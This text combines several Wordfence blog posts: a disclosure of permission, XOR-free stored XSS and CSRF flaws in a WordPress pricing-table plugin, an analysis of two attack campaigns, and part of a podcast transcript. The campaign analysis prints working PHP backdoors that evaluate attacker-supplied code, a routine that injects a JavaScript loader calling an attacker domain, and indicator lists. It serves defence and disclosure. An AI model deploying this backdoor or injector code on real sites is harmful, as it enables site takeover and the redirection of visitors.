Multiple Vulnerabilities Patched in Pricing Table by Supsystic Plugin

On January 17th, our Threat Intelligence Team discovered several vulnerabilities in Pricing Table by Supsystic, a WordPress plugin installed on over 40,000 sites. These flaws allowed an unauthenticated user to execute several AJAX actions due to an insecure permissions weakness. Attackers were also able to inject malicious JavaScript due to a Cross-Site Scripting (XSS) vulnerability, access pricing table data, and forge requests on behalf of a site administrator because of a Cross-Site Request Forgery (CSRF) vulnerability.

These vulnerabilities could allow attackers to run malicious JavaScript in a visitor’s browser, redirecting site visitors to malicious websites or stealing an administrator’s cookies to authenticate as that administrator. We privately disclosed these issues to the plugin’s author, who released patches a month later.

We highly recommend updating to version 1.8.2 immediately as these security issues are fully patched in that version.

Wordfence premium users received a new firewall rule on January 18th to protect against exploits targeting these vulnerabilities. Free Wordfence users received this rule on February 17th.


Description: Insecure Permissions on AJAX Actions
Affected Plugin: Pricing Table by Supsystic
Affected Versions: <= 1.8.1
CVE ID: CVE-2020-9392
CVSS Score: 7.3 (High)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Patched Version: 1.8.2

Pricing Table by Supsystic provides users with the ability to easily add customizable pricing tables to their site. These can be used to display pricing for products or services and compare the differences between each offering. The plugin makes it easy to create new tables, import or modify tables, and export pricing table settings, all of which are powered by AJAX actions. While analyzing the plugin, we discovered that the AJAX actions were registered with a wp_ajax_nopriv_ hook, allowing any unauthenticated user the ability to successfully send an AJAX request completing an action registered with that hook.

add_action('wp_ajax_nopriv_'. $this->_action, array($mod->getController(), $this->_action));

Upon further analysis, we found that despite the actions being registered with a wp_ajax_nopriv_ hook, there was a separate security permission check on nearly all of the AJAX actions. However, the permissions check was missing for a few select actions: createFromTpl, a function that creates new pricing tables; getJSONExportTable, a function used to export existing tables; and importJSONTable, a function used to import a new pricing table or update an existing one.

public function getPermissions() {
    return array(
        PTS_USERLEVELS => array(
            PTS_ADMIN => array('getListForTbl', 'remove', 'removeGroup', 'clear',
                'save', 'exportForDb', 'updateLabel', 'changeTpl', 'saveAsCopy', 'getJSONExportTable', 'createFromTpl')
        )
    );
}

In the vulnerable version, getJSONExportTable, importJSONTable, and createFromTpl were all absent from the getPermissions() list at the bottom of the controller.php file. The snippet above shows the list with getJSONExportTable and createFromTpl added; all three actions are covered in the latest version of the plugin.

This meant that any unauthenticated user could execute those 3 functions and obtain sensitive information regarding any given pricing table while creating and importing new pricing tables or altering already existing ones.

Information retrieved from getJSONExportTable.


Description: Unauthenticated Stored XSS
Affected Plugin: Pricing Table by Supsystic
Affected Versions: <= 1.8.1
CVE ID: CVE-2020-9393
CVSS Score: 6.1 (Medium)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
Patched Version: 1.8.2

As an extension of the previous vulnerability, we discovered that a stored XSS vulnerability could be exploited through the importJSONTable endpoint. This function imports a JSON body containing all of the settings needed to create a new pricing table or edit an existing one.

Several of the parameters are handled without any input sanitization, allowing JavaScript as input. Alone, this wouldn’t be considered a security issue: input supplied via the administrative dashboard isn’t sanitized because administrators hold the unfiltered_html capability. However, when combined with AJAX actions that can be sent with no authentication, an XSS vulnerability is created.

In order to exploit this vulnerability, an attacker would need to send a request containing the details of the table they would like to modify, along with their malicious JavaScript payload. This payload could be a script that steals user cookies and sends them to the attacker, who then uses them to gain administrative access to your site. Alternatively, it could be a script that redirects users to a malicious site where their computer could be infected. The malicious JavaScript would then execute any time a user navigated to the page with the stored script.

An attacker could edit a pricing table so that the malicious payload only executed when an administrator accessed the pricing table list from the administrative dashboard, or it could be executed when any user accessed a page that displayed a pricing table. It simply depended on which parameter the malicious Javascript was injected into.

Here is what it looks like when the payload is injected into the table label parameter and executed in the administrative dashboard.

Here is what it looks like when the payload is injected into the custom HTML parameter and executed on the front end of a site.


Description: Cross-Site Request Forgery to XSS and Setting Changes
Affected Plugin: Pricing Table by Supsystic
Affected Versions: <= 1.8.0
CVE ID: CVE-2020-9394
CVSS Score: 8.8 (High)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Patched Version: 1.8.1

To further escalate, we found that none of the endpoints in the plugin were protected by WordPress nonces for CSRF protection. The source of requests was not verified, so an attacker could forge a crafted request on behalf of a site administrator and inject malicious JavaScript or simply modify the settings of any given pricing table.
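The three issues above (admin actions reachable through wp_ajax_nopriv_ with no capability check, table fields stored and rendered without sanitization or escaping, and no nonce on any endpoint) are all closed by the same handful of WordPress APIs. The following is an added example written for this post, not code from Pricing Table by Supsystic: the action name pts_demo_save_label, the option name pts_demo_labels and the script handle pts-demo-admin are made up for illustration; everything else is the standard WordPress API.

```php
<?php
/**
 * Added example (not the plugin's code): a privileged AJAX action done safely.
 * Assumed names: action 'pts_demo_save_label', option 'pts_demo_labels',
 * script handle 'pts-demo-admin'. Everything else is the WordPress API.
 */

// 1. Register the handler on wp_ajax_ only. Leaving out wp_ajax_nopriv_ means
//    admin-ajax.php rejects logged-out requests before our code runs. (The
//    vulnerable pattern registered both hooks and relied on a hand-maintained
//    permission list that missed three actions.)
add_action( 'wp_ajax_pts_demo_save_label', 'pts_demo_save_label' );

function pts_demo_save_label() {
    // 2. CSRF: the request must carry a nonce minted for this action and this
    //    user. check_ajax_referer() dies with -1 (HTTP 403) if it is absent or stale.
    check_ajax_referer( 'pts_demo_save_label', 'nonce' );

    // 3. Authorization: being logged in is not enough; require the capability
    //    the action actually needs.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 4. Input: coerce to the type you expect and strip tags on the way in.
    $table_id = isset( $_POST['table_id'] ) ? absint( $_POST['table_id'] ) : 0;
    $label    = isset( $_POST['label'] ) ? sanitize_text_field( wp_unslash( $_POST['label'] ) ) : '';
    if ( 0 === $table_id || '' === $label ) {
        wp_send_json_error( array( 'message' => 'bad request' ), 400 );
    }

    $labels              = (array) get_option( 'pts_demo_labels', array() );
    $labels[ $table_id ] = $label;
    update_option( 'pts_demo_labels', $labels );

    wp_send_json_success( array( 'table_id' => $table_id, 'label' => $label ) );
}

// 5. Output: escape at the point of rendering, whether the label is shown in
//    the dashboard list or on the public page, so a stored payload renders as text.
function pts_demo_render_label( $table_id ) {
    $labels = (array) get_option( 'pts_demo_labels', array() );
    $label  = isset( $labels[ $table_id ] ) ? $labels[ $table_id ] : '';
    return '<span class="pts-label" data-table="' . esc_attr( $table_id ) . '">'
         . esc_html( $label ) . '</span>';
}

// 6. Hand the nonce to the admin script so its AJAX request can include it.
add_action( 'admin_enqueue_scripts', 'pts_demo_enqueue' );
function pts_demo_enqueue( $hook ) {
    wp_enqueue_script( 'pts-demo-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'pts-demo-admin', 'ptsDemo', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'pts_demo_save_label' ),
    ) );
}
```

Actions that genuinely must be reachable by logged-out visitors are registered on wp_ajax_nopriv_ separately and validated on their own; nothing that creates, imports or exports tables belongs there. Where a field must carry HTML, such as a custom HTML block, store it through wp_kses_post() and reserve raw storage for users who actually hold unfiltered_html.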

PoC Walkthrough: Exploiting XSS

Disclosure Timeline

January 17th, 2020 – Vulnerability initially discovered and analyzed. We begin working on firewall rules.
January 18th, 2020 – Firewall rule released for Wordfence premium users. Initial outreach to plugin team.
January 21st, 2020 – Developer confirms appropriate inbox for handling discussion. Full disclosure of vulnerabilities is sent.
January 30th, 2020 – Follow-up with the developer as no response from disclosure.
February 10th, 2020 – Additional follow-up as no response from disclosure still.
February 11th, 2020 – Developer acknowledges report. Notifies us that the patch will be released the following week.
February 17th, 2020 – Wordfence free users receive firewall rule.
February 21st, 2020 – Patch released. Missing permission check on one action, notified developer.
February 24th, 2020 – Sufficient patch released.

Conclusion

In today’s post, we detailed several vulnerabilities including stored XSS, CSRF, and insecure permissions found in the Pricing Table by Supsystic plugin. These flaws have been patched in version 1.8.2 and we recommend that users update to the latest version available immediately. Sites running Wordfence Premium have been protected from attacks against this vulnerability since January 18th. Sites running the free version of Wordfence received the same firewall rule update on February 17th, 2020.

The post Multiple Vulnerabilities Patched in Pricing Table by Supsystic Plugin appeared first on Wordfence.


Multiple Attack Campaigns Targeting Recent Plugin Vulnerabilities

As part of our ongoing research efforts, the Wordfence Threat Intelligence team continually monitors our network for noteworthy threats facing WordPress. Recently, we’ve been tracking malicious activity targeting several vulnerabilities recently patched in popular plugins.

In today’s post, we’ll provide details of our research into two active campaigns. We’ll also share some common indicators of compromise (IOCs) that can help you assess whether your site was impacted by these attacks. Wordfence malware scans will identify these IOCs and their variants on systems with the plugin installed, but we include them to help administrators and researchers better approach this data at scale.

Threat Actor #1: “tonyredball”

Notable Targeted Vulnerabilities:

The first campaign we’ll discuss has been associated with the handle “tonyredball”. This threat actor has primarily focused on exploiting vulnerabilities which allow backdoor access to victim sites.

We identified the “tonyredball” handle after the attacker attempted to exploit the administrator registration vulnerability in the Profile Builder plugin. Requests exploiting this vulnerability contain the username, email, and other profile details of the new administrator account.

Snippet from a blocked attempt to exploit Profile Builder by "tonyredball".

Compared to this threat actor’s activity against Profile Builder, they’ve issued a much greater volume of attacks against the database deletion vulnerability in ThemeGrill Demo Importer. This difference in volume may be due to the amount of work required to exploit each vulnerability. The Profile Builder vulnerability requires attackers to locate a vulnerable registration form, but ThemeGrill’s vulnerability could be exploited with a simple request to a known endpoint.

The end result of exploiting either of these vulnerabilities is administrative access to the victim’s site. With this access, the attacker uploads malicious scripts through the plugin and theme uploaders in the WordPress dashboard.

Snippet of an attempt by "tonyredball" to upload a backdoor.


Variants of the script uploaded in the example above have been previously associated with several filenames. The most common are blockspluginn.php, wp-block-plugin.php, and supersociall.php, though the primary names associated directly with this threat actor are wp-block-plugin.php and wp-hello-plugin.php.

// Fires only when the marker field is present and the MD5 of the password field matches.
if (isset($_POST['asavsdvds']) && md5($_POST["lgkfghdfh"]) == "e9787adc5271cb0f765294503da3f2dc") {
    $z2 = '<?php ' . base64_decode($_REQUEST['d1']);  // attacker-supplied PHP, base64-encoded
    $a = '/tmp/mn';
    @file_put_contents($a, $z2);  // write it to a temp file...
    @include ($a);                // ...execute it...
    @unlink($a);                  // ...and delete it again
    die();
}

In the code sample above, we see part of the deobfuscated contents of wp-block-plugin.php. This small script allows an attacker to execute arbitrary PHP code on a victim’s site, establishing a persistent backdoor in case their administrator account is removed. The intended code is base64-encoded and submitted as $_REQUEST['d1'], where it’s decoded and stored as a file named /tmp/mn. This file is then executed via @include, and then immediately deleted from the server. It’s also password-protected to prevent other actors from using this backdoor.

We’ve intercepted a number of requests to these backdoors across our network. The payloads sent are varied in scope, but largely focus on iterating through a site’s file system to infect more files. Some events show “tonyredball” searching for additional WordPress installations to infect, while others try to inject malicious code into the victim’s legitimate JavaScript files.

// $f is the path of a .js file found by the enclosing search loop (not shown).
// The hgkgfhjereve4 variable doubles as an "already infected" marker.
$g = file_get_contents($f);
if (strpos($g, 'hgkgfhjereve4') !== false) {
    echo "#already exist#:".$f."\n";
} else {
    // Loader to prepend; the String.fromCharCode() call decodes to
    // https://slow.destinyfernandi.com/same.js?v=3
    $l2 = "var hgkgfhjereve4 = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,108,111,119,46,100,101,115,116,105,110,121,102,101,114,110,97,110,100,105,46,99,111,109,47,115,97,109,101,46,106,115,63,118,61,51); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}";
    // Prepend the loader above the legitimate code, then re-read the file
    // to confirm the marker is now present.
    $g = $l2.$g;
    @file_put_contents($f,$g);
    $g = file_get_contents($f);
    if (strpos($g, 'hgkgfhjereve4') !== false) {
        echo "#already exist#:".$f."\n";
    }
}

This code snippet shows part of a backdoor payload intended to inject malicious JavaScript. In context, this code is executed after searching for filenames with .js and will insert new code above the existing content of the legitimate file. When run in a browser, this code sources a third-party script from https://slow.destinyfernandi.com/same.js?v=3.

This third-party script, when loaded, redirects the visitor’s browser to a potentially malicious location. Unlike more sophisticated malvertising scripts, there isn’t any conditional logic to prevent redirection for repeat visitors or logged-in users, meaning it’s much more likely to be caught and reported early. However, regardless of the current contents, scripts hosted on an attacker’s server can be modified at any time and it’s a major risk.

In addition to backdoor scripts, “tonyredball” also uses the WordPress plugin and theme editor to inject third-party JavaScript into a site’s content. A line like <script type=text/javascript src='https://middle.destinyfernandi.com/t.js'></script> is added, usually to a theme’s header.php script, where it loads the script at https://middle.destinyfernandi.com/t.js into visitors’ browsers. We’ve identified additional domains used in these attacks, which are listed in the IOC section below.

Screenshot of a redirect destination attempting to trick visitors into allowing permissions.

Currently, these redirect scripts take victims to a landing page at the domain talktofranky.com. On arrival, visitors are told to click “Allow” in a popup to prove they’re human. This is a trick, as the site is actually requesting permission to push notifications to the victim’s device. Searches for discussion about this domain reveal a number of guides on how to stop the notification spam, meaning this campaign is likely claiming a number of victims.

The latest attacks by “tonyredball” are sourced from one primary IP address: 45.129.96.17. This address is associated with Estonian hosting provider GMHost. GMHost is a known bulletproof host, and has been referenced recently on hacking forums as such. “Bulletproof” refers to hosting providers known to have lax or unenforced abuse policies, commonly located in countries without close relationships with international law enforcement. These hosts give hackers a place to conduct illegal activity with little fear of being shut down or otherwise punished.

Indicators of Compromise (IOCs)

  • Username
    • tonyredball
  • Email address
    • tonyredball@mail.com
  • IP Addresses
    • 45.129.96.17
    • 188.127.251.74
  • Malware Hashes (SHA-1)
    • 34d4b9a33f7a1ab39a264cdffde644264adcf4d1
    • 7648b981f7c8f497ab81f0323379734fd0898f84
  • Searchable strings in obfuscated backdoors
    • jweyc
    • aeskoly
    • owhggiku
    • callbrhy
  • Script injected into plugin and theme files
    • <script type=text/javascript src='https://room.verybeatifulantony.com/t.js'></script>
    • <script type=text/javascript src='https://middle.destinyfernandi.com/t.js'></script>
  • Malicious Domains
    • verybeatifulantony.com
    • room.verybeatifulantony.com
    • tom.verybeatifulantony.com
    • destinyfernandi.com
    • slow.destinyfernandi.com
    • middle.destinyfernandi.com
    • fast.destinyfernandi.com
    • talktofranky.com
  • Malicious filename
    • wp-block-plugin.php
    • wp-hello-plugin.php
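The indicators above are only useful if they are actually checked against the file system. The following is an added example, not Wordfence’s scanner: a PHP sweep that walks a WordPress install and reports files matching the filenames, SHA-1 hashes, searchable strings and domains listed for this actor. It decodes String.fromCharCode() calls before matching domains, so the obfuscated loader URL shown in the injected JavaScript earlier is caught as well as a plain script tag. The command-line usage and the choice to scan only .php, .js and .html files are assumptions made for this example.

```php
<?php
/**
 * Added example, not Wordfence code: an IOC sweep for the indicators in this
 * post. Usage (assumed): php ioc-sweep.php /var/www/html
 * The indicator values below are the ones listed in the post.
 */

$root = $argv[1] ?? getcwd();

$iocs = [
    'filenames' => ['wp-block-plugin.php', 'wp-hello-plugin.php', 'blockspluginn.php', 'supersociall.php'],
    'sha1'      => ['34d4b9a33f7a1ab39a264cdffde644264adcf4d1', '7648b981f7c8f497ab81f0323379734fd0898f84'],
    'strings'   => ['jweyc', 'aeskoly', 'owhggiku', 'callbrhy', 'hgkgfhjereve4'],
    'domains'   => ['verybeatifulantony.com', 'destinyfernandi.com', 'talktofranky.com'],
];

// String.fromCharCode(104,116,...) hides a URL from a plain grep; decode every
// such call so the domain list can be matched against the result.
function decode_fromcharcode(string $src): array {
    $found = [];
    if (preg_match_all('/String\.fromCharCode\(\s*([\d\s,]+)\)/i', $src, $m)) {
        foreach ($m[1] as $codes) {
            $chars = array_map('intval', preg_split('/\s*,\s*/', trim($codes)));
            $found[] = implode('', array_map('chr', $chars));
        }
    }
    return $found;
}

// Return a list of indicator labels that match this one file (empty if clean).
function scan_file(string $path, array $iocs): array {
    $hits = [];
    $name = basename($path);
    if (in_array($name, $iocs['filenames'], true)) {
        $hits[] = "filename:$name";
    }
    $sha1 = sha1_file($path);
    if (in_array($sha1, $iocs['sha1'], true)) {
        $hits[] = "sha1:$sha1";
    }
    $src = file_get_contents($path);
    if ($src === false) {
        return $hits;
    }
    foreach ($iocs['strings'] as $s) {
        if (strpos($src, $s) !== false) {
            $hits[] = "string:$s";
        }
    }
    // Match domains both in clear text and inside decoded fromCharCode payloads.
    $haystack = $src . "\n" . implode("\n", decode_fromcharcode($src));
    foreach ($iocs['domains'] as $d) {
        if (stripos($haystack, $d) !== false) {
            $hits[] = "domain:$d";
        }
    }
    return $hits;
}

$it = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
);
foreach ($it as $file) {
    if (!$file->isFile() || !preg_match('/\.(php|js|html?)$/i', $file->getFilename())) {
        continue;
    }
    // This script contains the indicator strings itself; do not report it.
    if (realpath($file->getPathname()) === realpath(__FILE__)) {
        continue;
    }
    $hits = scan_file($file->getPathname(), $iocs);
    if ($hits) {
        echo $file->getPathname(), "\t", implode(' ', $hits), "\n";
    }
}
```

A hit on a searchable string or domain is a lead, not a verdict: the obfuscated backdoors are small enough to read by hand, and a legitimate file that merely mentions one of these domains (a blocklist, for instance) will also match. Hash and filename hits, by contrast, identify the actor’s own uploads directly.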

Threat Actor #2 – “solarsalvador1234”

Notable Targeted Vulnerabilities:

Similar to “tonyredball”, we identified the handle associated with today’s second threat actor through their exploitation of the Profile Builder administrator registration vulnerability. These requests revealed a more sophisticated attack campaign than our previous example, as the threat actor was generating unique identifiers for each attempt.

In the requests we’ve blocked from this attacker, we see randomly-generated alphanumeric strings used as usernames, first and last names, and email addresses. Identifiers generated in this manner begin with a prefix (com_ in early attacks, then just com subsequently) followed by eight random characters. The values are used together: one attack might use comxAwqw5de as the username and comxAwqw5de@mail.com as the email, and the next attack would use a different generated string for those values.

However, for a period of about two and a half hours on February 17th, the requests weren’t using a random email address. More than a hundred blocked requests in this window used the same email address: solarsalvador1234@gmail.com. These attacks came from the same IP as the rest in this campaign, and still used the random naming scheme for the created usernames.

Screenshot of Google search results showing "solarsalvador1234" as an Author on multiple hacked sites.


The email address solarsalvador1234@gmail.com has been previously associated with attacks against the Convert Plus plugin, where a similar vulnerability allowed attackers to register a privileged user. Google searches for this address reveal a number of compromised WordPress sites showing an associated user profile.

In addition to the Profile Builder and ThemeGrill Demo Importer vulnerabilities, the IP address associated with “solarsalvador1234” is also exploiting Duplicator’s recent file download flaw. By downloading wp-config.php files from vulnerable sites, they can use the stored credentials to access remote MySQL databases and compromise the site from there. In all three vulnerabilities, the end goal is the same: Administrative access to the victim’s WordPress site.

In the attacks we’re currently tracking, we’ve identified “solarsalvador1234” attempting to upload backdoors through the same method as “tonyredball”: the WordPress theme uploader. However, instead of uploading a single file as in our previous example, they upload a malicious archive named AdvanceImage5.zip. This ZIP archive technically contains a valid WordPress theme, having copied the index.php and style.css scripts from the Twenty Fifteen theme, required for WordPress to correctly store the extracted files. Other than those required files, the archive is purely malicious and contains backdoors intended to help the attacker maintain access long-term. The malicious theme AdvanceImage5 has previously been associated with other attack campaigns, including those targeting last year’s vulnerability in the WP Cost Estimation plugin.

<?php
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);
$data = NULL;
$data_key = NULL;
$GLOBALS["auth"] = "4ef63abe-1abd-45a6-913d-6fb99657e24b";
global $auth;

// XOR $data against $key, repeating the key as often as needed.
function sh_decrypt_phase($data, $key) {
    $out_data = "";
    for ($i = 0; $i < strlen($data);) {
        $jplufmtpaem = "i";   // leftover from the obfuscator, never used
        for ($j = 0; $j < strlen($key) && $i < strlen($data); $j++, $i++) {
            $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
        }
    }
    return $out_data;
}

// Two XOR layers: first with the hard-coded $auth, then with the per-request key.
function sh_decrypt($data, $key) {
    global $auth;
    return sh_decrypt_phase(sh_decrypt_phase($data, $auth), $key);
}

// The last cookie (or, failing that, the last POST field) carries the payload;
// its name doubles as the per-request XOR key.
foreach($_COOKIE as $key => $value) {
    $data = $value;
    $data_key = $key;
}

if(!$data) {
    foreach($_POST as $key => $value) {
        $data = $value;
        $data_key = $key;
    }
}
$data = @unserialize(sh_decrypt(@base64_decode( $data ) ,  $data_key ));

if (isset($data["ak"]) && $auth == $data["ak"]) {
    if ($data["a"] == "i") {
        // "info": report the PHP version and the backdoor's own version
        $i = Array("pv" => @phpversion() , "sv" => "1.0-1" , );
        echo @serialize($i);
    }
    elseif ($data["a"] == "e") {
        // "eval": run whatever PHP the operator sent
        eval($data["d"]);
    }
}

?>

The code snippet above shows the deobfuscated contents of the campaign’s primary backdoor, located in AdvanceImage5/header.php. This script features protections much like our earlier example, intended to prevent other attackers from abusing the script. Taking things a step further, an XOR cipher is used to encrypt requests sent to the backdoor, presumably in an attempt to bypass detection by firewalls and security teams. Ultimately though, the behavior is the same for “solarsalvador1234” as it is for the backdoor used by “tonyredball”: an attacker can execute PHP scripts at will on the infected site.
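The XOR layer hides the command from a signature-based firewall, but it offers no confidentiality against anyone who has the backdoor file: the per-request key is the cookie or POST field name, which travels in the clear, and $auth is hard-coded in header.php. The following added example (not code from the campaign) shows how an analyst with the file and a captured request recovers the command that was sent. The cookie name and the command in the sample request are constructed here for illustration.

```php
<?php
/**
 * Added example, not malware from the campaign: decode one captured request to
 * the AdvanceImage5 backdoor, given the $auth value from header.php and the
 * name/value pair the request carried. The sample request is constructed below.
 */

// XOR $data against $key repeated. Same operation as the backdoor's routine,
// and symmetric, so one function both encrypts and decrypts.
function xor_repeat(string $data, string $key): string {
    $out  = '';
    $klen = strlen($key);
    for ($i = 0, $n = strlen($data); $i < $n; $i++) {
        $out .= chr(ord($data[$i]) ^ ord($key[$i % $klen]));
    }
    return $out;
}

// Undo base64, then the two XOR layers (hard-coded $auth, then the request
// name), then unserialize with object instantiation disabled so decoding a
// hostile blob stays passive.
function decode_backdoor_request(string $name, string $value, string $auth): ?array {
    $raw = base64_decode($value, true);
    if ($raw === false) {
        return null;
    }
    $plain = xor_repeat(xor_repeat($raw, $auth), $name);
    $cmd   = @unserialize($plain, ['allowed_classes' => false]);
    return is_array($cmd) ? $cmd : null;
}

// --- Constructed sample: what an operator would send for "eval this" ---
$auth  = '4ef63abe-1abd-45a6-913d-6fb99657e24b';   // from the backdoor above
$name  = 'PHPSESSID';                               // assumed cookie name (the per-request key)
$cmd   = ['ak' => $auth, 'a' => 'e', 'd' => 'echo php_uname();'];
$value = base64_encode(xor_repeat(xor_repeat(serialize($cmd), $name), $auth));

$decoded = decode_backdoor_request($name, $value, $auth);
if ($decoded !== null) {
    printf("action=%s payload=%s\n", $decoded['a'], $decoded['d']);
}
```

When working from web server logs, remember that the backdoor takes the last cookie or POST field it sees, so a request with several cookies must be decoded with the name of the final one. Because the whole scheme is XOR with known keys, a WAF rule cannot inspect the command, but it can still match on the request shape: a single opaque base64 cookie posted to a theme file that should never be requested directly.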

The activity associated with “solarsalvador1234” is linked to the IP address 77.71.115.52. We mentioned this address in our earlier post about attacks against a recent Duplicator vulnerability, noting that a number of otherwise-legitimate websites are hosted on the server. It’s not uncommon for attacks to come from compromised webservers, as they offer attackers a layer of abstraction to hide their physical location from victims.

Indicators of Compromise (IOCs)

  • Usernames
    • Randomly generated, starting with com or com_
  • Email addresses
    • solarsalvador1234@gmail.com
    • Other randomly generated addresses, starting with com or com_ and ending with @mail.com
  • IP Address
    • 77.71.115.52
  • Malware Hashes (SHA-1)
    • 47cb1646eba89f42319aa757423464476eb2fa7d
    • 3015d8f30b23eb6ebec608e992ff25ceccc6408d
    • f8ae2f3fcc05f04aece9ca0e0e21c64f25c4f0d6
    • 93632169238cbb52daee5271c90c533f7614e7b1
  • Malicious Filepaths
    • wp-content/themes/AdvanceImage5/config.php
    • wp-content/themes/AdvanceImage5/functions.php
    • wp-content/themes/AdvanceImage5/header.php

Conclusion

The campaigns we’ve detailed in this post are just two examples of attacks targeting recently patched vulnerabilities. As the owner of a site, it’s your responsibility to remain aware of the changes made to the plugins and themes you use. When a security update is released, make it an immediate priority to install it. The threat actors facing the WordPress ecosystem quickly identify and exploit vulnerabilities, which compounds the importance of timely action to protect your infrastructure.

All of the malicious code discussed in this post is detected by the Wordfence malware scanner. This is true for Premium users as well as the sites still using the free version. If you’re unable to use Wordfence and are concerned about these campaigns, please make use of the indicators of compromise (IOCs) we’ve shared to assist in your analysis.

The Wordfence Threat Intelligence team is always on the lookout for new activity to report to the community. Whether new developments arise in the campaigns we’ve discussed today, or something entirely new descends on the WordPress ecosystem, we’ll report our findings as they emerge.

Special thanks to Director of Threat Intelligence Sean Murphy and QA Engineer Ram Gall for their assistance researching these attack campaigns and editing this post.

The post Multiple Attack Campaigns Targeting Recent Plugin Vulnerabilities appeared first on Wordfence.


Episode 66: New Plugin Vulnerabilities & Succeeding as a Digital Nomad with Chloe at WCPHX

It has been a busy week in WordPress security with active attacks on a number of plugins including ThemeREX Addons and ThemeGrill Demo Importer. In this week’s Think Like a Hacker, we look at what’s happening, review what a zero-day vulnerability is, and give you some advice on keeping WordPress installations clean and safe.

We also look at a vulnerability uncovered in the wpCentral plugin installed on over 60,000 sites, a WHO phishing attack, and Malwarebytes’ State of Malware report.

At WordCamp Phoenix, Wordfence Threat Analyst Chloe Chamberland spoke to a packed room of attendees looking to learn more about how she succeeds working remotely as a digital nomad.

Her talk starts at 19:13 if you’d like to skip ahead, though we recommend watching her talk on the YouTube video embedded below to see Chloe’s travel photos and audience interaction.

Here are timestamps for the audio if you would like to skip around:
4:27 Vulnerability in wpCentral Plugin Leads to Privilege Escalation
7:11 Zero-Day Vulnerability in ThemeREX Addons Plugin Exploited in the Wild
10:00 What is a “Zero Day”
11:28 Critical Issue In ThemeGrill Demo Importer Leads To Database Wipe and Auth Bypass
13:05 Keeping your WordPress installation clean
13:45 World Health Organization Warns of Coronavirus Phishing Attacks
16:28 Malwarebytes State of Malware 2020 Report
19:13 How to Succeed at Working Remotely as a Nomad – Chloe Chamberland’s talk at WordCamp Phoenix, video embedded below

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Chloe Chamberland on Twitter as @infosecChloe.

Please feel free to post your feedback in the comments below.

Transcript for Episode 66

Kathy Zant:
Welcome to Think Like a Hacker, the podcast about WordPress security and innovation. I am Kathy Zant, your host, and this is episode 66. So, we have a number of plugin vulnerabilities to discuss as well as audio from Chloe Chamberland’s talk at WordCamp Phoenix. Now, I interviewed Chloe a few weeks ago from a remote location in Alaska where she was seeing the Aurora Borealis as well as meeting a moose for the first time. At WordCamp Phoenix, she gave a presentation where she outlined what made her successful as a remote working digital nomad. Her talk was incredibly successful. I had a number of people come up to me after her talk saying how much they enjoyed it and the inspiration they got from Chloe’s talk. So, we hope you enjoy that.

Now, if you know someone that you think would make an interesting guest and think like a hacker, please reach out to press@wordfence.com. We have a number of guests coming on the show in the next few weeks, but I want to hear from you. What are some of the challenges, some of the things you’re thinking about. What can we do to make your WordPress life easier? So press@wordfence.com, that comes to me and I will be in touch.

First of all, we have a new story about WordCamp Asia. Now, as many of you know, WordCamp Asia was canceled last week. The announcement came out, I think on February 11th, that it was canceled because of concerns in the region tied to the coronavirus. We did receive news that WordCamp Asia for 2021 has been scheduled. It is scheduled for January 2021.

Now, if you had a plan to go to WordCamp Asia and did not recoup all of your cancellation fees or found some financial hardship in this cancellation, there is a fund set up for some remuneration that could help you with that. That fund was started by Wordfence, and GoDaddy and Yoast also contributed. Now there are still funds available as a part of this assistance package. There is a process to go through in order to apply for assistance.

That is all detailed on the blog and I’ll have notes, links in the show notes.

We do have a number of plugin vulnerabilities to discuss today, but first I wanted to make a note, an editorial about plugin vulnerabilities and what it means for WordPress. Now there may be people out there that tell you “WordPress is insecure, look at all the plugin vulnerabilities that exist.” I would take a contrary opinion to that primarily because the fact that WordPress is open-source means that plugin vulnerabilities, theme vulnerabilities, even vulnerabilities in core are disclosed, firewalled, patched much more quickly than a closed-source system might experience. So, the fact that we are seeing these vulnerabilities discussed and disclosed and firewalled is evidence that WordPress is secure and WordPress is secure more than I think other systems because of the community that’s associated with WordPress. It’s part of what makes WordPress unique. It’s part of what makes open source unique.

So don’t be afraid because you hear about plugin vulnerabilities and instead, feel empowered. Feel empowered by the fact that security researchers are poking at WordPress plugins. We are poking at WordPress core and themes and we are looking for vulnerabilities all of the time. This is just one way that WordPress and Wordfence and the other security researchers who are looking at vulnerabilities are working to keep your site, your business, and your assets as safe as possible.

So plugin vulnerability number one. This was published by Chloe Chamberland on February 17th. This was a vulnerability in the wpCentral plugin and this led to a privilege escalation. So, on February 13th, our threat intelligence team at Wordfence discovered a vulnerability in wpCentral. This was installed on over 60,000 sites at the time of our discovery. So wpCentral is a WordPress plugin. It’s designed to be used along with the wpCentral management dashboards. So this is another plugin that you plug into your WordPress site that allows you to basically manage WordPress through a different interface.

The software is designed to make site management easy and it has functionalities including automated sign-on with one click, as well as the ability to create backups, edit posts in their premium version and other things of that nature. So, this privilege escalation flaw allowed anyone that had an account on a WordPress site to basically escalate their privileges to that of an administrator, which is definitely problematic if you have a WordPress site that allows anyone to register. So if someone comes along and wants to register for updates and their level is a subscriber, they would then be able to escalate their privileges from a subscriber to an administrator, which of course, leads to a complete site takeover.

So of course, Chloe found this vulnerability, contacted the developer, and they made a number of changes to their plugin to ensure that their users are safe. We created a firewall rule to protect Wordfence premium customers and free users will receive that rule on March 15th.

